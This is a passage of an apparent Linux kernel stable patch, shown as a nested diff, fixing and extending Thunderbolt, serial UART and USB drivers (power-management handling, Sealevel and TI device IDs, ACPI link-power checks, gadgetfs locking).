+ 	ret = of_property_read_string_index(np, "qcom,protection-domain",
+ 					    1, &adev->service_path);
+-	if (ret < 0) {
++	if (ret < 0 && ret != -EINVAL) {
+ 		dev_err(dev, "Failed to read second value of qcom,protection-domain\n");
+ 		goto out;
+ 	}
+diff --git a/drivers/staging/vc04_services/include/linux/raspberrypi/vchiq.h b/drivers/staging/vc04_services/include/linux/raspberrypi/vchiq.h
+index db1441c0cc662..690ab7165b2c1 100644
+--- a/drivers/staging/vc04_services/include/linux/raspberrypi/vchiq.h
++++ b/drivers/staging/vc04_services/include/linux/raspberrypi/vchiq.h
+@@ -86,7 +86,7 @@ struct vchiq_service_params_kernel {
+ 
+ struct vchiq_instance;
+ 
+-extern enum vchiq_status vchiq_initialise(struct vchiq_instance **pinstance);
++extern int vchiq_initialise(struct vchiq_instance **pinstance);
+ extern enum vchiq_status vchiq_shutdown(struct vchiq_instance *instance);
+ extern enum vchiq_status vchiq_connect(struct vchiq_instance *instance);
+ extern enum vchiq_status vchiq_open_service(struct vchiq_instance *instance,
+diff --git a/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.h b/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.h
+index 2851ef6b9cd0f..cd20eb18f2751 100644
+--- a/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.h
++++ b/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.h
+@@ -100,10 +100,10 @@ vchiq_dump_platform_use_state(struct vchiq_state *state);
+ extern void
+ vchiq_dump_service_use_state(struct vchiq_state *state);
+ 
+-extern enum vchiq_status
++extern int
+ vchiq_use_internal(struct vchiq_state *state, struct vchiq_service *service,
+ 		   enum USE_TYPE_E use_type);
+-extern enum vchiq_status
++extern int
+ vchiq_release_internal(struct vchiq_state *state,
+ 		       struct vchiq_service *service);
+ 
+diff --git a/drivers/thunderbolt/retimer.c b/drivers/thunderbolt/retimer.c
+index 81252e31014a1..56008eb91e2e4 100644
+--- a/drivers/thunderbolt/retimer.c
++++ b/drivers/thunderbolt/retimer.c
+@@ -427,13 +427,6 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ {
+ 	u32 status[TB_MAX_RETIMER_INDEX + 1] = {};
+ 	int ret, i, last_idx = 0;
+-	struct usb4_port *usb4;
+-
+-	usb4 = port->usb4;
+-	if (!usb4)
+-		return 0;
+-
+-	pm_runtime_get_sync(&usb4->dev);
+ 
+ 	/*
+ 	 * Send broadcast RT to make sure retimer indices facing this
+@@ -441,7 +434,7 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 	 */
+ 	ret = usb4_port_enumerate_retimers(port);
+ 	if (ret)
+-		goto out;
++		return ret;
+ 
+ 	/*
+ 	 * Enable sideband channel for each retimer. We can do this
+@@ -471,12 +464,11 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 			break;
+ 	}
+ 
+-	if (!last_idx) {
+-		ret = 0;
+-		goto out;
+-	}
++	if (!last_idx)
++		return 0;
+ 
+ 	/* Add on-board retimers if they do not exist already */
++	ret = 0;
+ 	for (i = 1; i <= last_idx; i++) {
+ 		struct tb_retimer *rt;
+ 
+@@ -490,10 +482,6 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 		}
+ 	}
+ 
+-out:
+-	pm_runtime_mark_last_busy(&usb4->dev);
+-	pm_runtime_put_autosuspend(&usb4->dev);
+-
+ 	return ret;
+ }
+ 
+diff --git a/drivers/thunderbolt/tb.c b/drivers/thunderbolt/tb.c
+index 4628458044270..3f1ab30c4fb15 100644
+--- a/drivers/thunderbolt/tb.c
++++ b/drivers/thunderbolt/tb.c
+@@ -628,11 +628,15 @@ static void tb_scan_port(struct tb_port *port)
+ 			 * Downstream switch is reachable through two ports.
+ 			 * Only scan on the primary port (link_nr == 0).
+ 			 */
++
++	if (port->usb4)
++		pm_runtime_get_sync(&port->usb4->dev);
++
+ 	if (tb_wait_for_port(port, false) <= 0)
+-		return;
++		goto out_rpm_put;
+ 	if (port->remote) {
+ 		tb_port_dbg(port, "port already has a remote\n");
+-		return;
++		goto out_rpm_put;
+ 	}
+ 
+ 	tb_retimer_scan(port, true);
+@@ -647,12 +651,12 @@ static void tb_scan_port(struct tb_port *port)
+ 		 */
+ 		if (PTR_ERR(sw) == -EIO || PTR_ERR(sw) == -EADDRNOTAVAIL)
+ 			tb_scan_xdomain(port);
+-		return;
++		goto out_rpm_put;
+ 	}
+ 
+ 	if (tb_switch_configure(sw)) {
+ 		tb_switch_put(sw);
+-		return;
++		goto out_rpm_put;
+ 	}
+ 
+ 	/*
+@@ -681,7 +685,7 @@ static void tb_scan_port(struct tb_port *port)
+ 
+ 	if (tb_switch_add(sw)) {
+ 		tb_switch_put(sw);
+-		return;
++		goto out_rpm_put;
+ 	}
+ 
+ 	/* Link the switches using both links if available */
+@@ -733,6 +737,12 @@ static void tb_scan_port(struct tb_port *port)
+ 
+ 	tb_add_dp_resources(sw);
+ 	tb_scan_switch(sw);
++
++out_rpm_put:
++	if (port->usb4) {
++		pm_runtime_mark_last_busy(&port->usb4->dev);
++		pm_runtime_put_autosuspend(&port->usb4->dev);
++	}
+ }
+ 
+ static void tb_deactivate_and_free_tunnel(struct tb_tunnel *tunnel)
+diff --git a/drivers/thunderbolt/tunnel.c b/drivers/thunderbolt/tunnel.c
+index 2c3cf7fc33571..1fc3c29b24f83 100644
+--- a/drivers/thunderbolt/tunnel.c
++++ b/drivers/thunderbolt/tunnel.c
+@@ -1275,7 +1275,7 @@ static void tb_usb3_reclaim_available_bandwidth(struct tb_tunnel *tunnel,
+ 		return;
+ 	} else if (!ret) {
+ 		/* Use maximum link rate if the link valid is not set */
+-		ret = usb4_usb3_port_max_link_rate(tunnel->src_port);
++		ret = tb_usb3_max_link_rate(tunnel->dst_port, tunnel->src_port);
+ 		if (ret < 0) {
+ 			tb_tunnel_warn(tunnel, "failed to read maximum link rate\n");
+ 			return;
+diff --git a/drivers/thunderbolt/xdomain.c b/drivers/thunderbolt/xdomain.c
+index f00b2f62d8e3c..9a3c52f6b8c97 100644
+--- a/drivers/thunderbolt/xdomain.c
++++ b/drivers/thunderbolt/xdomain.c
+@@ -1419,12 +1419,19 @@ static int tb_xdomain_get_properties(struct tb_xdomain *xd)
+ 	 * registered, we notify the userspace that it has changed.
+ 	 */
+ 	if (!update) {
+-		struct tb_port *port;
++		/*
++		 * Now disable lane 1 if bonding was not enabled. Do
++		 * this only if bonding was possible at the beginning
++		 * (that is we are the connection manager and there are
++		 * two lanes).
++		 */
++		if (xd->bonding_possible) {
++			struct tb_port *port;
+ 
+-		/* Now disable lane 1 if bonding was not enabled */
+-		port = tb_port_at(xd->route, tb_xdomain_parent(xd));
+-		if (!port->bonded)
+-			tb_port_disable(port->dual_link_port);
++			port = tb_port_at(xd->route, tb_xdomain_parent(xd));
++			if (!port->bonded)
++				tb_port_disable(port->dual_link_port);
++		}
+ 
+ 		if (device_add(&xd->dev)) {
+ 			dev_err(&xd->dev, "failed to add XDomain device\n");
+diff --git a/drivers/tty/serial/8250/8250_exar.c b/drivers/tty/serial/8250/8250_exar.c
+index 314a05e009df9..64770c62bbec5 100644
+--- a/drivers/tty/serial/8250/8250_exar.c
++++ b/drivers/tty/serial/8250/8250_exar.c
+@@ -43,6 +43,12 @@
+ #define PCI_DEVICE_ID_EXAR_XR17V4358		0x4358
+ #define PCI_DEVICE_ID_EXAR_XR17V8358		0x8358
+ 
++#define PCI_DEVICE_ID_SEALEVEL_710xC		0x1001
++#define PCI_DEVICE_ID_SEALEVEL_720xC		0x1002
++#define PCI_DEVICE_ID_SEALEVEL_740xC		0x1004
++#define PCI_DEVICE_ID_SEALEVEL_780xC		0x1008
++#define PCI_DEVICE_ID_SEALEVEL_716xC		0x1010
++
+ #define UART_EXAR_INT0		0x80
+ #define UART_EXAR_8XMODE	0x88	/* 8X sampling rate select */
+ #define UART_EXAR_SLEEP		0x8b	/* Sleep mode */
+@@ -638,6 +644,8 @@ exar_pci_probe(struct pci_dev *pcidev, const struct pci_device_id *ent)
+ 		nr_ports = BIT(((pcidev->device & 0x38) >> 3) - 1);
+ 	else if (board->num_ports)
+ 		nr_ports = board->num_ports;
++	else if (pcidev->vendor == PCI_VENDOR_ID_SEALEVEL)
++		nr_ports = pcidev->device & 0xff;
+ 	else
+ 		nr_ports = pcidev->device & 0x0f;
+ 
+@@ -864,6 +872,12 @@ static const struct pci_device_id exar_pci_tbl[] = {
+ 	EXAR_DEVICE(COMMTECH, 4224PCI335, pbn_fastcom335_4),
+ 	EXAR_DEVICE(COMMTECH, 2324PCI335, pbn_fastcom335_4),
+ 	EXAR_DEVICE(COMMTECH, 2328PCI335, pbn_fastcom335_8),
++
++	EXAR_DEVICE(SEALEVEL, 710xC, pbn_exar_XR17V35x),
++	EXAR_DEVICE(SEALEVEL, 720xC, pbn_exar_XR17V35x),
++	EXAR_DEVICE(SEALEVEL, 740xC, pbn_exar_XR17V35x),
++	EXAR_DEVICE(SEALEVEL, 780xC, pbn_exar_XR17V35x),
++	EXAR_DEVICE(SEALEVEL, 716xC, pbn_exar_XR17V35x),
+ 	{ 0, }
+ };
+ MODULE_DEVICE_TABLE(pci, exar_pci_tbl);
+diff --git a/drivers/tty/serial/amba-pl011.c b/drivers/tty/serial/amba-pl011.c
+index aa0bbb7abeacf..0a1cc36f93aa7 100644
+--- a/drivers/tty/serial/amba-pl011.c
++++ b/drivers/tty/serial/amba-pl011.c
+@@ -1467,6 +1467,10 @@ static bool pl011_tx_chars(struct uart_amba_port *uap, bool from_irq)
+ 	struct circ_buf *xmit = &uap->port.state->xmit;
+ 	int count = uap->fifosize >> 1;
+ 
++	if ((uap->port.rs485.flags & SER_RS485_ENABLED) &&
++	    !uap->rs485_tx_started)
++		pl011_rs485_tx_start(uap);
++
+ 	if (uap->port.x_char) {
+ 		if (!pl011_tx_char(uap, uap->port.x_char, from_irq))
+ 			return true;
+@@ -1478,10 +1482,6 @@ static bool pl011_tx_chars(struct uart_amba_port *uap, bool from_irq)
+ 		return false;
+ 	}
+ 
+-	if ((uap->port.rs485.flags & SER_RS485_ENABLED) &&
+-	    !uap->rs485_tx_started)
+-		pl011_rs485_tx_start(uap);
+-
+ 	/* If we are using DMA mode, try to send some characters. */
+ 	if (pl011_dma_tx_irq(uap))
+ 		return true;
+diff --git a/drivers/tty/serial/atmel_serial.c b/drivers/tty/serial/atmel_serial.c
+index bd07f79a2df91..cff64e5edee26 100644
+--- a/drivers/tty/serial/atmel_serial.c
++++ b/drivers/tty/serial/atmel_serial.c
+@@ -2673,13 +2673,7 @@ static void __init atmel_console_get_options(struct uart_port *port, int *baud,
+ 	else if (mr == ATMEL_US_PAR_ODD)
+ 		*parity = 'o';
+ 
+-	/*
+-	 * The serial core only rounds down when matching this to a
+-	 * supported baud rate. Make sure we don't end up slightly
+-	 * lower than one of those, as it would make us fall through
+-	 * to a much lower baud rate than we really want.
+-	 */
+-	*baud = port->uartclk / (16 * (quot - 1));
++	*baud = port->uartclk / (16 * quot);
+ }
+ 
+ static int __init atmel_console_setup(struct console *co, char *options)
+diff --git a/drivers/tty/serial/pch_uart.c b/drivers/tty/serial/pch_uart.c
+index b17788cf309b1..83f35b7b0897c 100644
+--- a/drivers/tty/serial/pch_uart.c
++++ b/drivers/tty/serial/pch_uart.c
+@@ -752,7 +752,7 @@ static void pch_dma_tx_complete(void *arg)
+ 	}
+ 	xmit->tail &= UART_XMIT_SIZE - 1;
+ 	async_tx_ack(priv->desc_tx);
+-	dma_unmap_sg(port->dev, sg, priv->orig_nent, DMA_TO_DEVICE);
++	dma_unmap_sg(port->dev, priv->sg_tx_p, priv->orig_nent, DMA_TO_DEVICE);
+ 	priv->tx_dma_use = 0;
+ 	priv->nent = 0;
+ 	priv->orig_nent = 0;
+diff --git a/drivers/tty/serial/qcom_geni_serial.c b/drivers/tty/serial/qcom_geni_serial.c
+index 83b66b73303af..7905935b9f1b4 100644
+--- a/drivers/tty/serial/qcom_geni_serial.c
++++ b/drivers/tty/serial/qcom_geni_serial.c
+@@ -864,9 +864,10 @@ out_unlock:
+ 	return IRQ_HANDLED;
+ }
+ 
+-static void get_tx_fifo_size(struct qcom_geni_serial_port *port)
++static int setup_fifos(struct qcom_geni_serial_port *port)
+ {
+ 	struct uart_port *uport;
++	u32 old_rx_fifo_depth = port->rx_fifo_depth;
+ 
+ 	uport = &port->uport;
+ 	port->tx_fifo_depth = geni_se_get_tx_fifo_depth(&port->se);
+@@ -874,6 +875,16 @@ static void get_tx_fifo_size(struct qcom_geni_serial_port *port)
+ 	port->rx_fifo_depth = geni_se_get_rx_fifo_depth(&port->se);
+ 	uport->fifosize =
+ 		(port->tx_fifo_depth * port->tx_fifo_width) / BITS_PER_BYTE;
++
++	if (port->rx_fifo && (old_rx_fifo_depth != port->rx_fifo_depth) && port->rx_fifo_depth) {
++		port->rx_fifo = devm_krealloc(uport->dev, port->rx_fifo,
++					      port->rx_fifo_depth * sizeof(u32),
++					      GFP_KERNEL);
++		if (!port->rx_fifo)
++			return -ENOMEM;
++	}
++
++	return 0;
+ }
+ 
+ 
+@@ -888,6 +899,7 @@ static int qcom_geni_serial_port_setup(struct uart_port *uport)
+ 	u32 rxstale = DEFAULT_BITS_PER_CHAR * STALE_TIMEOUT;
+ 	u32 proto;
+ 	u32 pin_swap;
++	int ret;
+ 
+ 	proto = geni_se_read_proto(&port->se);
+ 	if (proto != GENI_SE_UART) {
+@@ -897,7 +909,9 @@ static int qcom_geni_serial_port_setup(struct uart_port *uport)
+ 
+ 	qcom_geni_serial_stop_rx(uport);
+ 
+-	get_tx_fifo_size(port);
++	ret = setup_fifos(port);
++	if (ret)
++		return ret;
+ 
+ 	writel(rxstale, uport->membase + SE_UART_RX_STALE_CNT);
+ 
+diff --git a/drivers/usb/cdns3/cdns3-gadget.c b/drivers/usb/cdns3/cdns3-gadget.c
+index 5adcb349718c3..ccfaebca6faa7 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.c
++++ b/drivers/usb/cdns3/cdns3-gadget.c
+@@ -2614,6 +2614,7 @@ int cdns3_gadget_ep_dequeue(struct usb_ep *ep,
+ 	u8 req_on_hw_ring = 0;
+ 	unsigned long flags;
+ 	int ret = 0;
++	int val;
+ 
+ 	if (!ep || !request || !ep->desc)
+ 		return -EINVAL;
+@@ -2649,6 +2650,13 @@ found:
+ 
+ 	/* Update ring only if removed request is on pending_req_list list */
+ 	if (req_on_hw_ring && link_trb) {
++		/* Stop DMA */
++		writel(EP_CMD_DFLUSH, &priv_dev->regs->ep_cmd);
++
++		/* wait for DFLUSH cleared */
++		readl_poll_timeout_atomic(&priv_dev->regs->ep_cmd, val,
++					  !(val & EP_CMD_DFLUSH), 1, 1000);
++
+ 		link_trb->buffer = cpu_to_le32(TRB_BUFFER(priv_ep->trb_pool_dma +
+ 			((priv_req->end_trb + 1) * TRB_SIZE)));
+ 		link_trb->control = cpu_to_le32((le32_to_cpu(link_trb->control) & TRB_CYCLE) |
+@@ -2660,6 +2668,10 @@ found:
+ 
+ 	cdns3_gadget_giveback(priv_ep, priv_req, -ECONNRESET);
+ 
++	req = cdns3_next_request(&priv_ep->pending_req_list);
++	if (req)
++		cdns3_rearm_transfer(priv_ep, 1);
++
+ not_found:
+ 	spin_unlock_irqrestore(&priv_dev->lock, flags);
+ 	return ret;
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index bbab424b0d559..0aaaadb02cc69 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -44,6 +44,9 @@
+ #define USB_PRODUCT_USB5534B			0x5534
+ #define USB_VENDOR_CYPRESS			0x04b4
+ #define USB_PRODUCT_CY7C65632			0x6570
++#define USB_VENDOR_TEXAS_INSTRUMENTS		0x0451
++#define USB_PRODUCT_TUSB8041_USB3		0x8140
++#define USB_PRODUCT_TUSB8041_USB2		0x8142
+ #define HUB_QUIRK_CHECK_PORT_AUTOSUSPEND	0x01
+ #define HUB_QUIRK_DISABLE_AUTOSUSPEND		0x02
+ 
+@@ -5798,6 +5801,16 @@ static const struct usb_device_id hub_id_table[] = {
+       .idVendor = USB_VENDOR_GENESYS_LOGIC,
+       .bInterfaceClass = USB_CLASS_HUB,
+       .driver_info = HUB_QUIRK_CHECK_PORT_AUTOSUSPEND},
++    { .match_flags = USB_DEVICE_ID_MATCH_VENDOR
++			| USB_DEVICE_ID_MATCH_PRODUCT,
++      .idVendor = USB_VENDOR_TEXAS_INSTRUMENTS,
++      .idProduct = USB_PRODUCT_TUSB8041_USB2,
++      .driver_info = HUB_QUIRK_DISABLE_AUTOSUSPEND},
++    { .match_flags = USB_DEVICE_ID_MATCH_VENDOR
++			| USB_DEVICE_ID_MATCH_PRODUCT,
++      .idVendor = USB_VENDOR_TEXAS_INSTRUMENTS,
++      .idProduct = USB_PRODUCT_TUSB8041_USB3,
++      .driver_info = HUB_QUIRK_DISABLE_AUTOSUSPEND},
+     { .match_flags = USB_DEVICE_ID_MATCH_DEV_CLASS,
+       .bDeviceClass = USB_CLASS_HUB},
+     { .match_flags = USB_DEVICE_ID_MATCH_INT_CLASS,
+diff --git a/drivers/usb/core/usb-acpi.c b/drivers/usb/core/usb-acpi.c
+index 6d93428432f13..533baa85083c2 100644
+--- a/drivers/usb/core/usb-acpi.c
++++ b/drivers/usb/core/usb-acpi.c
+@@ -37,6 +37,71 @@ bool usb_acpi_power_manageable(struct usb_device *hdev, int index)
+ }
+ EXPORT_SYMBOL_GPL(usb_acpi_power_manageable);
+ 
++#define UUID_USB_CONTROLLER_DSM "ce2ee385-00e6-48cb-9f05-2edb927c4899"
++#define USB_DSM_DISABLE_U1_U2_FOR_PORT	5
++
++/**
++ * usb_acpi_port_lpm_incapable - check if lpm should be disabled for a port.
++ * @hdev: USB device belonging to the usb hub
++ * @index: zero based port index
++ *
++ * Some USB3 ports may not support USB3 link power management U1/U2 states
++ * due to different retimer setup. ACPI provides _DSM method which returns 0x01
++ * if U1 and U2 states should be disabled. Evaluate _DSM with:
++ * Arg0: UUID = ce2ee385-00e6-48cb-9f05-2edb927c4899
++ * Arg1: Revision ID = 0
++ * Arg2: Function Index = 5
++ * Arg3: (empty)
++ *
++ * Return 1 if USB3 port is LPM incapable, negative on error, otherwise 0
++ */
++
++int usb_acpi_port_lpm_incapable(struct usb_device *hdev, int index)
++{
++	union acpi_object *obj;
++	acpi_handle port_handle;
++	int port1 = index + 1;
++	guid_t guid;
++	int ret;
++
++	ret = guid_parse(UUID_USB_CONTROLLER_DSM, &guid);
++	if (ret)
++		return ret;
++
++	port_handle = usb_get_hub_port_acpi_handle(hdev, port1);
++	if (!port_handle) {
++		dev_dbg(&hdev->dev, "port-%d no acpi handle\n", port1);
++		return -ENODEV;
++	}
++
++	if (!acpi_check_dsm(port_handle, &guid, 0,
++			    BIT(USB_DSM_DISABLE_U1_U2_FOR_PORT))) {
++		dev_dbg(&hdev->dev, "port-%d no _DSM function %d\n",
++			port1, USB_DSM_DISABLE_U1_U2_FOR_PORT);
++		return -ENODEV;
++	}
++
++	obj = acpi_evaluate_dsm(port_handle, &guid, 0,
++				USB_DSM_DISABLE_U1_U2_FOR_PORT, NULL);
++
++	if (!obj)
++		return -ENODEV;
++
++	if (obj->type != ACPI_TYPE_INTEGER) {
++		dev_dbg(&hdev->dev, "evaluate port-%d _DSM failed\n", port1);
++		ACPI_FREE(obj);
++		return -EINVAL;
++	}
++
++	if (obj->integer.value == 0x01)
++		ret = 1;
++
++	ACPI_FREE(obj);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(usb_acpi_port_lpm_incapable);
++
+ /**
+  * usb_acpi_set_power_state - control usb port's power via acpi power
+  * resource
+diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
+index 3a6b4926193ef..7bbc776185469 100644
+--- a/drivers/usb/gadget/configfs.c
++++ b/drivers/usb/gadget/configfs.c
+@@ -392,6 +392,7 @@ static void gadget_info_attr_release(struct config_item *item)
+ 	WARN_ON(!list_empty(&gi->string_list));
+ 	WARN_ON(!list_empty(&gi->available_func));
+ 	kfree(gi->composite.gadget_driver.function);
++	kfree(gi->composite.gadget_driver.driver.name);
+ 	kfree(gi);
+ }
+ 
+@@ -1571,7 +1572,6 @@ static const struct usb_gadget_driver configfs_driver_template = {
+ 	.max_speed	= USB_SPEED_SUPER_PLUS,
+ 	.driver = {
+ 		.owner          = THIS_MODULE,
+-		.name		= "configfs-gadget",
+ 	},
+ 	.match_existing_only = 1,
+ };
+@@ -1622,13 +1622,21 @@ static struct config_group *gadgets_make(
+ 
+ 	gi->composite.gadget_driver = configfs_driver_template;
+ 
++	gi->composite.gadget_driver.driver.name = kasprintf(GFP_KERNEL,
++							    "configfs-gadget.%s", name);
++	if (!gi->composite.gadget_driver.driver.name)
++		goto err;
++
+ 	gi->composite.gadget_driver.function = kstrdup(name, GFP_KERNEL);
+ 	gi->composite.name = gi->composite.gadget_driver.function;
+ 
+ 	if (!gi->composite.gadget_driver.function)
+-		goto err;
++		goto out_free_driver_name;
+ 
+ 	return &gi->group;
++
++out_free_driver_name:
++	kfree(gi->composite.gadget_driver.driver.name);
+ err:
+ 	kfree(gi);
+ 	return ERR_PTR(-ENOMEM);
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index c36bcfa0e9b46..424bb3b666dbd 100644
+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -83,7 +83,9 @@ static inline struct f_ncm *func_to_ncm(struct usb_function *f)
+ /* peak (theoretical) bulk transfer rate in bits-per-second */
+ static inline unsigned ncm_bitrate(struct usb_gadget *g)
+ {
+-	if (gadget_is_superspeed(g) && g->speed >= USB_SPEED_SUPER_PLUS)
++	if (!g)
++		return 0;
++	else if (gadget_is_superspeed(g) && g->speed >= USB_SPEED_SUPER_PLUS)
+ 		return 4250000000U;
+ 	else if (gadget_is_superspeed(g) && g->speed == USB_SPEED_SUPER)
+ 		return 3750000000U;
+diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
+index 01c3ead7d1b42..d605bc2e7e8fd 100644
+--- a/drivers/usb/gadget/legacy/inode.c
++++ b/drivers/usb/gadget/legacy/inode.c
+@@ -229,6 +229,7 @@ static void put_ep (struct ep_data *data)
+  */
+ 
+ static const char *CHIP;
++static DEFINE_MUTEX(sb_mutex);		/* Serialize superblock operations */
+ 
+ /*----------------------------------------------------------------------*/
+ 
+@@ -2010,13 +2011,20 @@ gadgetfs_fill_super (struct super_block *sb, struct fs_context *fc)
+ {
+ 	struct inode	*inode;
+ 	struct dev_data	*dev;
++	int		rc;
+ 
+-	if (the_device)
+-		return -ESRCH;
++	mutex_lock(&sb_mutex);
++
++	if (the_device) {
++		rc = -ESRCH;
++		goto Done;
++	}
+ 
+ 	CHIP = usb_get_gadget_udc_name();
+-	if (!CHIP)
+-		return -ENODEV;
++	if (!CHIP) {
++		rc = -ENODEV;
++		goto Done;
++	}
+ 
+ 	/* superblock */
+ 	sb->s_blocksize = PAGE_SIZE;
+@@ -2053,13 +2061,17 @@ gadgetfs_fill_super (struct super_block *sb, struct fs_context *fc)
+ 	 * from binding to a controller.
+ 	 */
+ 	the_device = dev;
+-	return 0;
++	rc = 0;
++	goto Done;
+ 
+-Enomem:
++ Enomem:
+ 	kfree(CHIP);
+ 	CHIP = NULL;
++	rc = -ENOMEM;
+ 
+-	return -ENOMEM;
++ Done:
++	mutex_unlock(&sb_mutex);
++	return rc;
+ }
+ 
+ /* "mount -t gadgetfs path /dev/gadget" ends up here */
+@@ -2081,6 +2093,7 @@ static int gadgetfs_init_fs_context(struct fs_context *fc)
+ static void
+ gadgetfs_kill_sb (struct super_block *sb)
+ {
++	mutex_lock(&sb_mutex);
+ 	kill_litter_super (sb);
+ 	if (the_device) {
+ 		put_dev (the_device);
+@@ -2088,6 +2101,7 @@ gadgetfs_kill_sb (struct super_block *sb)
+ 	}
+ 	kfree(CHIP);
+ 	CHIP = NULL;
++	mutex_unlock(&sb_mutex);
+ }
+ 
+ /*----------------------------------------------------------------------*/
+diff --git a/drivers/usb/gadget/legacy/webcam.c b/drivers/usb/gadget/legacy/webcam.c
+index 94e22867da1d0..e9b5846b2322c 100644
+--- a/drivers/usb/gadget/legacy/webcam.c
++++ b/drivers/usb/gadget/legacy/webcam.c
+@@ -293,6 +293,7 @@ static const struct uvc_descriptor_header * const uvc_fs_streaming_cls[] = {
+ 	(const struct uvc_descriptor_header *) &uvc_format_yuv,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_720p,
++	(const struct uvc_descriptor_header *) &uvc_color_matching,
+ 	(const struct uvc_descriptor_header *) &uvc_format_mjpg,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_720p,
+@@ -305,6 +306,7 @@ static const struct uvc_descriptor_header * const uvc_hs_streaming_cls[] = {
+ 	(const struct uvc_descriptor_header *) &uvc_format_yuv,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_720p,
++	(const struct uvc_descriptor_header *) &uvc_color_matching,
+ 	(const struct uvc_descriptor_header *) &uvc_format_mjpg,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_720p,
+@@ -317,6 +319,7 @@ static const struct uvc_descriptor_header * const uvc_ss_streaming_cls[] = {
+ 	(const struct uvc_descriptor_header *) &uvc_format_yuv,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_yuv_720p,
++	(const struct uvc_descriptor_header *) &uvc_color_matching,
+ 	(const struct uvc_descriptor_header *) &uvc_format_mjpg,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_360p,
+ 	(const struct uvc_descriptor_header *) &uvc_frame_mjpg_720p,
+diff --git a/drivers/usb/host/ehci-fsl.c b/drivers/usb/host/ehci-fsl.c
+index 9cea785934e59..38d06e5abfbb3 100644
+--- a/drivers/usb/host/ehci-fsl.c
++++ b/drivers/usb/host/ehci-fsl.c
+@@ -29,7 +29,7 @@
+ #include "ehci-fsl.h"
+ 
+ #define DRIVER_DESC "Freescale EHCI Host controller driver"
+-#define DRV_NAME "ehci-fsl"
++#define DRV_NAME "fsl-ehci"
+ 
+ static struct hc_driver __read_mostly fsl_ehci_hc_driver;
+ 
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index f98cf30a3c1a5..232e175e4e964 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -78,9 +78,12 @@ static const char hcd_name[] = "xhci_hcd";
+ static struct hc_driver __read_mostly xhci_pci_hc_driver;
+ 
+ static int xhci_pci_setup(struct usb_hcd *hcd);
++static int xhci_pci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
++				      struct usb_tt *tt, gfp_t mem_flags);
+ 
+ static const struct xhci_driver_overrides xhci_pci_overrides __initconst = {
+ 	.reset = xhci_pci_setup,
++	.update_hub_device = xhci_pci_update_hub_device,
+ };
+ 
+ /* called after powerup, by probe or system-pm "wakeup" */
+@@ -352,8 +355,38 @@ static void xhci_pme_acpi_rtd3_enable(struct pci_dev *dev)
+ 				NULL);
+ 	ACPI_FREE(obj);
+ }
++
++static void xhci_find_lpm_incapable_ports(struct usb_hcd *hcd, struct usb_device *hdev)
++{
++	struct xhci_hcd	*xhci = hcd_to_xhci(hcd);
++	struct xhci_hub *rhub = &xhci->usb3_rhub;
++	int ret;
++	int i;
++
++	/* This is not the usb3 roothub we are looking for */
++	if (hcd != rhub->hcd)
++		return;
++
++	if (hdev->maxchild > rhub->num_ports) {
++		dev_err(&hdev->dev, "USB3 roothub port number mismatch\n");
++		return;
++	}
++
++	for (i = 0; i < hdev->maxchild; i++) {
++		ret = usb_acpi_port_lpm_incapable(hdev, i);
++
++		dev_dbg(&hdev->dev, "port-%d disable U1/U2 _DSM: %d\n", i + 1, ret);
++
++		if (ret >= 0) {
++			rhub->ports[i]->lpm_incapable = ret;
++			continue;
++		}
++	}
++}
++
+ #else
+ static void xhci_pme_acpi_rtd3_enable(struct pci_dev *dev) { }
++static void xhci_find_lpm_incapable_ports(struct usb_hcd *hcd, struct usb_device *hdev) { }
+ #endif /* CONFIG_ACPI */
+ 
+ /* called during probe() after chip reset completes */
+@@ -386,6 +419,16 @@ static int xhci_pci_setup(struct usb_hcd *hcd)
+ 	return xhci_pci_reinit(xhci, pdev);
+ }
+ 
++static int xhci_pci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
++				      struct usb_tt *tt, gfp_t mem_flags)
++{
++	/* Check if acpi claims some USB3 roothub ports are lpm incapable */
++	if (!hdev->parent)
++		xhci_find_lpm_incapable_ports(hcd, hdev);
++
++	return xhci_update_hub_device(hcd, hdev, tt, mem_flags);
++}
++
+ /*
+  * We need to register our own PCI probe function (instead of the USB core's
+  * function) in order to create a second roothub under xHCI.
+@@ -455,6 +498,8 @@ static int xhci_pci_probe(struct pci_dev *dev, const struct pci_device_id *id)
+ 	if (xhci->quirks & XHCI_DEFAULT_PM_RUNTIME_ALLOW)
+ 		pm_runtime_allow(&dev->dev);
+ 
++	dma_set_max_seg_size(&dev->dev, UINT_MAX);
++
+ 	return 0;
+ 
+ put_usb3_hcd:
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
